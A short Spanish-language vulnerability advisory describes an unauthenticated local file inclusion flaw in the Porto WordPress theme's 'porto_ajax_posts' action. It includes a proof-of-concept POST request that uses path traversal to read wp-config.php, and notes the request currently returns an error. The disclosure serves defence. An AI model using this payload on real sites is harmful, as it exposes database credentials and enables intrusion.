
Porto <= 7.1.0 - Inclusión de Archivos Locales no Autenticada a través de porto_ajax_posts
Porto <= 7.1.0 - Inclusión de archivos locales no autenticada a través de porto_ajax_posts
El tema Porto para WordPress es vulnerable a la inclusión de archivos locales en todas las versiones hasta, e incluyendo, 7.1.0 a través de la función 'porto_ajax_posts'. Esto permite que atacantes no autenticados incluyan y ejecuten archivos arbitrarios en el servidor, permitiendo la ejecución de cualquier código PHP en esos archivos. Esto puede usarse para eludir controles de acceso, obtener datos sensibles o lograr la ejecución de código en casos donde se pueda subir e incluir un archivo de tipo php.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
Obteniendo un error 500 en este momento.